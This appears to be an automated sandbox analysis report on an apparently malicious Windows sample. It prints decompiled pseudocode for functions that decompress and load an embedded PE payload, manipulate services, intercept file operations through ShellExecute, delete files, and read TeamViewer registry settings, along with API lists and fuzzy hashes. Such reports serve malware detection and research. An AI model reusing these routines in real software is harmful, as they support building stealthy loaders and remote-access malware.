                                                                                                        0x70984e69
                                                                                                        0x70984e73
                                                                                                        0x70984e7b
                                                                                                        0x70984e7f
                                                                                                        0x70984e85
                                                                                                        0x70984e90
                                                                                                        0x70984e90
                                                                                                        0x00000000
                                                                                                        0x70984e7f

                                                                                                        APIs
                                                                                                        • CoCreateInstance.OLE32(7098D48C,00000000,00000001,7098D44C,?,00000000,?,?,?,?,70984F9B,00000001,?,?,?), ref: 70984D7B
                                                                                                        • SysAllocString.OLEAUT32(?), ref: 70984E11
                                                                                                        • SysAllocString.OLEAUT32(?), ref: 70984E9F
                                                                                                        • CoCreateInstance.OLE32(7098D46C,00000000,00000001,7098D41C,?,?,?,?,70984F9B,00000001,?,?,?), ref: 70984EB9
                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 70984F03
                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 70984F0A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: String$AllocCreateFreeInstance
                                                                                                        • String ID:
                                                                                                        • API String ID: 391255401-0
                                                                                                        • Opcode ID: dc9c5332f7d1fcc46e35c65f3815c756d083fc340b84ae6300ff46d1da082ef2
                                                                                                        • Instruction ID: b8ded13de83632c198dbe7331d2277e8668f9e70f6641c772e3cd326f34e95ed
                                                                                                        • Opcode Fuzzy Hash: dc9c5332f7d1fcc46e35c65f3815c756d083fc340b84ae6300ff46d1da082ef2
                                                                                                        • Instruction Fuzzy Hash: EB61BFB56043469FC700DFA9C980D2AB7E9BFC8208F10495DF69A8B391D771ED46CB62
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 709822F0, Relevance: 9.1, APIs: 6, Instructions: 84filememoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E709822F0(WCHAR* _a4, long* _a8) {
				long _v4;
				long _v8;
				void* _t21;
				long _t27;
				intOrPtr* _t30;
				void* _t33;

				_t21 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0);
				if(_t21 == 0xffffffff) {
					return 0;
				} else {
					_t27 = GetFileSize(_t21, 0);
					if(_t27 == 0) {
						return 0;
					} else {
						_t33 = VirtualAlloc(0, _t27, 0x1000, 4);
						if(_t33 == 0) {
							L6:
							return 0;
						} else {
							_v4 = 0;
							ReadFile(_t21, _t33, _t27,  &_v4, 0);
							CloseHandle(_t21);
							_v8 = 0;
							_t30 = E70982220(_t33, _t27,  &_v8);
							VirtualFree(_t33, 0, 0x8000);
							if(_t30 == 0 ||  *_t30 != 0x5a4d) {
								goto L6;
							} else {
								 *_a8 = _v8;
								return _t30;
							}
						}
					}
				}
			}









                                                                                                        0x70982312
                                                                                                        0x70982317
                                                                                                        0x709823c5
                                                                                                        0x7098231d
                                                                                                        0x70982326
                                                                                                        0x7098232a
                                                                                                        0x709823bd
                                                                                                        0x70982330
                                                                                                        0x7098233f
                                                                                                        0x70982343
                                                                                                        0x709823ac
                                                                                                        0x709823b4
                                                                                                        0x70982345
                                                                                                        0x7098234f
                                                                                                        0x70982357
                                                                                                        0x7098235e
                                                                                                        0x7098236b
                                                                                                        0x70982383
                                                                                                        0x70982385
                                                                                                        0x7098238d
                                                                                                        0x00000000
                                                                                                        0x70982399
                                                                                                        0x709823a5
                                                                                                        0x709823ab
                                                                                                        0x709823ab
                                                                                                        0x7098238d
                                                                                                        0x70982343
                                                                                                        0x7098232a

                                                                                                        APIs
                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 7098230C
                                                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 70982320
                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004), ref: 70982339
                                                                                                        • ReadFile.KERNEL32 ref: 70982357
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 7098235E
                                                                                                          • Part of subcall function 70982220: VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 7098224A
                                                                                                          • Part of subcall function 70982220: RtlDecompressBuffer.NTDLL(00000002,00000000,?,?,?,?), ref: 70982261
                                                                                                          • Part of subcall function 70982220: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 70982275
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 70982385
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Virtual$File$AllocFree$BufferCloseCreateDecompressHandleReadSize
                                                                                                        • String ID:
                                                                                                        • API String ID: 3075244933-0
                                                                                                        • Opcode ID: e4921e73ccd6c12d66f2158f3593e22eb82fa617d4b9a0da7da187a78b384b96
                                                                                                        • Instruction ID: 6aac6570e908f1458465b0a3fe3e1c8d1f3b9607708639123f4aa01eef3d7af9
                                                                                                        • Opcode Fuzzy Hash: e4921e73ccd6c12d66f2158f3593e22eb82fa617d4b9a0da7da187a78b384b96
                                                                                                        • Instruction Fuzzy Hash: F02105762043106BD2105B69EC8CF8B7BACEBC5F62F60452AFD05D23C0D679990897B2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70982220, Relevance: 9.1, APIs: 6, Instructions: 79memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E70982220(void* _a4, long _a8, intOrPtr* _a12) {
				long _v4;
				long _v8;
				intOrPtr* _v22;
				long _v30;
				intOrPtr _v42;
				intOrPtr _t18;
				long _t34;
				void* _t35;
				void* _t36;
				void* _t37;

				_t37 = _a4;
				_t34 = _a8;
				_v8 = 0;
				_v4 = 0;
				do {
					_t36 = VirtualAlloc(0, _t34, 0x1000, 4);
					if(_t36 == 0) {
						goto L4;
					} else {
						if(RtlDecompressBuffer(2, _t36, _t34, _t37, _a8,  &_v8) != 0xc0000242) {
							_t35 = VirtualAlloc(0, _v30, 0x1000, 4);
							if(_t35 == 0) {
								break;
							} else {
								RtlMoveMemory(_t35, _t36, _v30);
								VirtualFree(_t36, 0, 0x8000);
								 *_v22 = _v42;
								return _t35;
							}
						} else {
							VirtualFree(_t36, 0, 0x8000);
							_t34 = _t34 + _t34;
							goto L4;
						}
					}
					L8:
					L4:
					_t18 = _v4 + 1;
					_v4 = _t18;
				} while (_t18 < 0x1e);
				 *_a12 = _v8;
				return 0;
				goto L8;
			}













                                                                                                        0x7098222b
                                                                                                        0x70982233
                                                                                                        0x70982237
                                                                                                        0x7098223b
                                                                                                        0x70982240
                                                                                                        0x7098224c
                                                                                                        0x70982250
                                                                                                        0x00000000
                                                                                                        0x70982252
                                                                                                        0x7098226b
                                                                                                        0x709822af
                                                                                                        0x709822b3
                                                                                                        0x00000000
                                                                                                        0x709822b5
                                                                                                        0x709822bc
                                                                                                        0x709822c9
                                                                                                        0x709822d7
                                                                                                        0x709822e2
                                                                                                        0x709822e2
                                                                                                        0x7098226d
                                                                                                        0x70982275
                                                                                                        0x7098227b
                                                                                                        0x00000000
                                                                                                        0x7098227b
                                                                                                        0x7098226b
                                                                                                        0x00000000
                                                                                                        0x7098227d
                                                                                                        0x70982281
                                                                                                        0x70982282
                                                                                                        0x70982286
                                                                                                        0x70982296
                                                                                                        0x7098229e
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 7098224A
                                                                                                        • RtlDecompressBuffer.NTDLL(00000002,00000000,?,?,?,?), ref: 70982261
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 70982275
                                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 709822AD
                                                                                                        • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 709822BC
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?), ref: 709822C9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Virtual$AllocFree$BufferDecompressMemoryMove
                                                                                                        • String ID:
                                                                                                        • API String ID: 201667072-0
                                                                                                        • Opcode ID: ad3133479b4f5e8a56f2b82fd2ebc97513938dfa3f830d298ab3550ab42e1820
                                                                                                        • Instruction ID: c0dcc6a8adc3de2b42206a41f1609db78e9f6ae752e152fe92648983f6a7e0b4
                                                                                                        • Opcode Fuzzy Hash: ad3133479b4f5e8a56f2b82fd2ebc97513938dfa3f830d298ab3550ab42e1820
                                                                                                        • Instruction Fuzzy Hash: A7214C722483016FD210DE19DC85F5BB7E9FBC9B11F54092DF655D7380D660E90887A6
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70985500, Relevance: 9.1, APIs: 6, Instructions: 67COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 43%
                                                                                                        			E70985500(signed short _a4) {
				char _v1564;
				short _v1572;
				void* _t5;
				intOrPtr _t6;
				intOrPtr _t8;
				intOrPtr _t17;
				signed short _t19;

				_t19 = _a4;
				if(_t19 != 0x65 ||  *0x7098f2ac >= 6 &&  *0x7098f5f4 == 0 &&  *0x7098f5f8 != 0) {
					_t5 = OpenEventW(2, 0, StrChrW(0x7098cad4, 0x54));
					if(_t5 == 0) {
						_t6 =  *0x7098f5e0; // 0xa42bb0
						_t17 =  *0x7098f5d4; // 0xa610b8
						_push(_t6);
						_push(_t19 & 0x0000ffff);
						_push(0x191);
						_push(_t17);
						_push(StrChrW(0x7098c514, 0x72));
						_t8 =  *0x7098f578; // 0xa51cc8
						_push(_t8);
						wsprintfW( &_v1572, StrChrW(0x7098caa0, 0x22));
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						return E70985220( &_v1564, 1, 0);
					} else {
						CloseHandle(_t5);
						return 0;
					}
				} else {
					return 0;
				}
			}










                                                                                                        0x70985507
                                                                                                        0x70985513
                                                                                                        0x7098554f
                                                                                                        0x70985557
                                                                                                        0x7098556b
                                                                                                        0x70985570
                                                                                                        0x70985576
                                                                                                        0x7098557a
                                                                                                        0x7098557b
                                                                                                        0x70985580
                                                                                                        0x7098558a
                                                                                                        0x7098558b
                                                                                                        0x70985590
                                                                                                        0x709855a0
                                                                                                        0x709855a6
                                                                                                        0x709855a8
                                                                                                        0x709855aa
                                                                                                        0x709855ac
                                                                                                        0x709855c7
                                                                                                        0x70985559
                                                                                                        0x7098555a
                                                                                                        0x7098556a
                                                                                                        0x7098556a
                                                                                                        0x70985530
                                                                                                        0x70985539
                                                                                                        0x70985539

                                                                                                        APIs
                                                                                                        • StrChrW.SHLWAPI(7098CAD4,00000054,00000000,00000000), ref: 70985548
                                                                                                        • OpenEventW.KERNEL32(00000002,00000000,00000000), ref: 7098554F
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 7098555A
                                                                                                        • StrChrW.SHLWAPI(7098C514,00000072,00A610B8,00000191,?,00A42BB0), ref: 70985588
                                                                                                        • StrChrW.SHLWAPI(7098CAA0,00000022,00A51CC8,00000000,?,00A42BB0), ref: 70985598
                                                                                                        • wsprintfW.USER32 ref: 709855A0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: CloseEventHandleOpenwsprintf
                                                                                                        • String ID:
                                                                                                        • API String ID: 3063877008-0
                                                                                                        • Opcode ID: b8a4d73267cb21f81cab20ab9f8a6fa10ce5cbe489804dd792d3cbdd6bdb4458
                                                                                                        • Instruction ID: 791ca8affe2b04ea0aa39224b75e1daa7f9bb0d752ee224e3bbe142ae8b35dd5
                                                                                                        • Opcode Fuzzy Hash: b8a4d73267cb21f81cab20ab9f8a6fa10ce5cbe489804dd792d3cbdd6bdb4458
                                                                                                        • Instruction Fuzzy Hash: F41136B36243007EF6209B66DC19FEB37AEE784705F90002AF505823E0E6745444D7A2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 709839F0, Relevance: 9.1, APIs: 6, Instructions: 63serviceCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 94%
                                                                                                        			E709839F0(short* _a4, short** _a8, int _a12, signed int _a16) {
				short* _t5;
				void* _t14;
				int _t19;
				void* _t24;
				void* _t25;
				signed int _t27;

				_t19 = 0;
				_t5 = OpenSCManagerW(0, 0, 0xf003f);
				_t25 = _t5;
				if(_t25 != 0) {
					L2:
					_t27 = _a16;
					asm("sbb eax, eax");
					_t24 = OpenServiceW(_t25, _a4, ( ~_t27 & 0xfff0fe05) + 0xf01ff);
					if(_t24 == 0) {
						L6:
						CloseServiceHandle(_t25);
						goto L7;
					} else {
						if(_t27 != 0) {
							_t19 = 1;
							goto L6;
						} else {
							_t14 = E70983920(_t24, _a8, _a12);
							CloseServiceHandle(_t24);
							CloseServiceHandle(_t25);
							return _t14;
						}
					}
				} else {
					_t25 = OpenSCManagerW(_t5, _t5, 1);
					if(_t25 == 0) {
						L7:
						return _t19;
					} else {
						goto L2;
					}
				}
			}









                                                                                                        0x709839fe
                                                                                                        0x70983a02
                                                                                                        0x70983a04
                                                                                                        0x70983a08
                                                                                                        0x70983a16
                                                                                                        0x70983a1b
                                                                                                        0x70983a23
                                                                                                        0x70983a38
                                                                                                        0x70983a3c
                                                                                                        0x70983a71
                                                                                                        0x70983a72
                                                                                                        0x00000000
                                                                                                        0x70983a3e
                                                                                                        0x70983a40
                                                                                                        0x70983a6c
                                                                                                        0x00000000
                                                                                                        0x70983a42
                                                                                                        0x70983a4d
                                                                                                        0x70983a58
                                                                                                        0x70983a5f
                                                                                                        0x70983a6b
                                                                                                        0x70983a6b
                                                                                                        0x70983a40
                                                                                                        0x70983a0a
                                                                                                        0x70983a10
                                                                                                        0x70983a14
                                                                                                        0x70983a7b
                                                                                                        0x70983a7e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70983a14

                                                                                                        APIs
                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,00000000,00000000,00000000,7098758A,0079A25C,00000000,00000000,00000001,?,00000000), ref: 70983A02
                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000001), ref: 70983A0E
                                                                                                        • OpenServiceW.ADVAPI32(00000000,?,?,750D2940), ref: 70983A32
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,00000000), ref: 70983A58
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 70983A5F
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 70983A72
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Service$CloseHandleOpen$Manager
                                                                                                        • String ID:
                                                                                                        • API String ID: 4196757001-0
                                                                                                        • Opcode ID: de9296429c5515099f926dbbcaae1a9376a79223b7e57cd967f6affef5a70725
                                                                                                        • Instruction ID: 442714e3795143dfc4b0e16b54a9507f0e5374b9e262805c5b48b6c08e038364
                                                                                                        • Opcode Fuzzy Hash: de9296429c5515099f926dbbcaae1a9376a79223b7e57cd967f6affef5a70725
                                                                                                        • Instruction Fuzzy Hash: 4C012EB3215319ABC3016EA99C80E7FB3ACEF84694B10413AF902D3381DBB8CC0056A2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70988830, Relevance: 9.0, APIs: 6, Instructions: 49stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 59%
                                                                                                        			E70988830(WCHAR* _a4, WCHAR* _a8) {
				WCHAR* _t6;
				long _t8;
				WCHAR* _t13;
				WCHAR* _t14;

				_t14 = _a4;
				_t13 = _a8;
				if(_t14 == 0 || _t13 == 0 || (GetFileAttributesW(_t14) & 0xffffffef) == 0) {
					L5:
					return  *0x7098f6a8(_t14, _t13);
				} else {
					_t6 = StrChrW(0x7098ce14, 0x72);
					_t8 = lstrcmpiW(PathFindFileNameW(_t13), _t6);
					if(_t8 != 0) {
						goto L5;
					} else {
						SetLastError(_t8);
						_push(0);
						_push(0);
						_push(1);
						E709844E0(StrChrW(0x7098cd68, 0x6f), _t14, 0);
						return 0;
					}
				}
			}







                                                                                                        0x70988832
                                                                                                        0x70988837
                                                                                                        0x7098883d
                                                                                                        0x7098889d
                                                                                                        0x709888a8
                                                                                                        0x70988851
                                                                                                        0x7098885e
                                                                                                        0x70988869
                                                                                                        0x70988871
                                                                                                        0x00000000
                                                                                                        0x70988873
                                                                                                        0x70988874
                                                                                                        0x7098887a
                                                                                                        0x7098887c
                                                                                                        0x7098887e
                                                                                                        0x7098888d
                                                                                                        0x7098889a
                                                                                                        0x7098889a
                                                                                                        0x70988871

                                                                                                        APIs
                                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 70988844
                                                                                                        • StrChrW.SHLWAPI(7098CE14,00000072), ref: 7098885E
                                                                                                        • PathFindFileNameW.SHLWAPI(?,00000000), ref: 70988862
                                                                                                        • lstrcmpiW.KERNEL32(00000000), ref: 70988869
                                                                                                        • SetLastError.KERNEL32(00000000), ref: 70988874
                                                                                                        • StrChrW.SHLWAPI(7098CD68,0000006F,?,00000000,00000001,00000000,00000000), ref: 7098888A
                                                                                                          • Part of subcall function 709844E0: RtlZeroMemory.NTDLL(0000003C,0000003C), ref: 709844EA
                                                                                                          • Part of subcall function 709844E0: ShellExecuteExW.SHELL32(0000003C), ref: 70984557
                                                                                                          • Part of subcall function 709844E0: WaitForSingleObject.KERNEL32(?,?), ref: 7098457D
                                                                                                          • Part of subcall function 709844E0: GetExitCodeProcess.KERNEL32 ref: 70984591
                                                                                                          • Part of subcall function 709844E0: CloseHandle.KERNEL32(?), ref: 7098459C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: File$AttributesCloseCodeErrorExecuteExitFindHandleLastMemoryNameObjectPathProcessShellSingleWaitZerolstrcmpi
                                                                                                        • String ID:
                                                                                                        • API String ID: 3429411208-0
                                                                                                        • Opcode ID: 6d093a68544d3f0096517d1b9d3dac4f3ac474551458a88361dafa8cf65c770d
                                                                                                        • Instruction ID: 4d2c492b64fdaffa1cb1777c50d0806cfd077b1bf1927b69b8bfeec79f74cb19
                                                                                                        • Opcode Fuzzy Hash: 6d093a68544d3f0096517d1b9d3dac4f3ac474551458a88361dafa8cf65c770d
                                                                                                        • Instruction Fuzzy Hash: E0F0D1737543107AD2202BB59C48F5F722CAF90B25F204429F716E63D2D370980087B6
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70982F69, Relevance: 9.0, APIs: 6, Instructions: 45fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 88%
                                                                                                        			E70982F69(void* _a16, struct _WIN32_FIND_DATAW _a20, char _a64, short _a608, short _a616) {
				signed char _t11;
				WCHAR* _t19;
				void* _t32;

				do {
					_t11 = _a20.dwFileAttributes;
					if((_t11 & 0x00000010) == 0 && _t11 != 0) {
						_push( &_a64);
						wsprintfW( &_a608, StrChrW(0x7098c658, 0x25));
						_t32 = _t32 + 0x10;
						_t19 = DeleteFileW( &_a616);
						if(_t19 == 0) {
							MoveFileExW( &_a616, _t19, 4);
						}
					}
				} while (FindNextFileW(_a16,  &_a20) != 0);
				FindClose(_a16);
				return 1;
			}






                                                                                                        0x70982f70
                                                                                                        0x70982f70
                                                                                                        0x70982f76
                                                                                                        0x70982f80
                                                                                                        0x70982f94
                                                                                                        0x70982f96
                                                                                                        0x70982fa1
                                                                                                        0x70982fa9
                                                                                                        0x70982fb6
                                                                                                        0x70982fb6
                                                                                                        0x70982fbc
                                                                                                        0x70982fd1
                                                                                                        0x70982fda
                                                                                                        0x70982fec

                                                                                                        APIs
                                                                                                        • StrChrW.SHLWAPI(7098C658,00000025,?,?), ref: 70982F89
                                                                                                        • wsprintfW.USER32 ref: 70982F94
                                                                                                        • DeleteFileW.KERNEL32(?), ref: 70982FA1
                                                                                                        • MoveFileExW.KERNEL32(?,00000000,00000004), ref: 70982FB6
                                                                                                        • FindNextFileW.KERNEL32(?,?), ref: 70982FCB
                                                                                                        • FindClose.KERNEL32(?), ref: 70982FDA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: File$Find$CloseDeleteMoveNextwsprintf
                                                                                                        • String ID:
                                                                                                        • API String ID: 2350977733-0
                                                                                                        • Opcode ID: 8d52e82d17d984bc93859ba6e0b1b7bc1464c02acc8d38358641b94b2e5b9607
                                                                                                        • Instruction ID: 3ff62d78d9ff31b2ca8bc04026b60f43229646857102d7a2c3521ea98e400fb0
                                                                                                        • Opcode Fuzzy Hash: 8d52e82d17d984bc93859ba6e0b1b7bc1464c02acc8d38358641b94b2e5b9607
                                                                                                        • Instruction Fuzzy Hash: 8A0121722183419BD720DF61CC88FEB77BCEBC4754F10091DFA4592380E736D8089662
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004E3E4E, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 133COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 004E3E55
                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,00506D47,PingThread,00000000,00000068), ref: 004A1B28
                                                                                                          • Part of subcall function 004378AA: __EH_prolog3.LIBCMT ref: 004378B1
                                                                                                          • Part of subcall function 004A18A4: __EH_prolog3_GS.LIBCMT ref: 004A18AB
                                                                                                          • Part of subcall function 004A18A4: InitializeCriticalSection.KERNEL32(?,00000028,004E3FC0,00000000,00000000,?,?,00000338,?,?,?,?,?,?,Default), ref: 004A18C0
                                                                                                          • Part of subcall function 004A18A4: _swprintf.LIBCMT ref: 004A18DE
                                                                                                          • Part of subcall function 004A2DA5: __EH_prolog3.LIBCMT ref: 004A2DAC
                                                                                                          • Part of subcall function 0040E8A9: __EH_prolog3.LIBCMT ref: 0040E8B0
                                                                                                          • Part of subcall function 004A17BA: __EH_prolog3.LIBCMT ref: 004A17C1
                                                                                                          • Part of subcall function 004A17BA: DeleteCriticalSection.KERNEL32(?,00000004,00506D61,?,PingThread,00000000,00000068), ref: 004A17DC
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3$CriticalSection$Initialize$DeleteH_prolog3_H_prolog3_catch_swprintf
                                                                                                        • String ID: 1.2.3$CStreamData::Push(): new buffer failed$zlib.deflateInit(): $zlib.inflateInit():
                                                                                                        • API String ID: 3502840786-3966930096
                                                                                                        • Opcode ID: 993021e881d22759d3a3c50d493d559afdfbe343122a51ed5933c3c07a9d19b0
                                                                                                        • Instruction ID: f6e5c56021fdac5c6cf456012923fc61614794486892b5eb81d3863a6473db74
                                                                                                        • Opcode Fuzzy Hash: 993021e881d22759d3a3c50d493d559afdfbe343122a51ed5933c3c07a9d19b0
                                                                                                        • Instruction Fuzzy Hash: 1251DAB0C01384EEDB10EFAAC58599EBFF4BF65304F54856EF04697281D7786A08CB65
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 005037EF, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 88registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3_GS.LIBCMT ref: 005037F6
                                                                                                        • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\TeamViewer3,00000000,00000001,?,00000000,00000054,0050422B,?,TV3REG,00000000,?,00749778,00000000,00000090), ref: 00503823
                                                                                                          • Part of subcall function 004D8E8D: __EH_prolog3.LIBCMT ref: 004D8E94
                                                                                                          • Part of subcall function 0040D53A: char_traits.LIBCPMT ref: 0040D55F
                                                                                                        • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000,000000FF,?,?,Proxy_IP), ref: 0050388E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
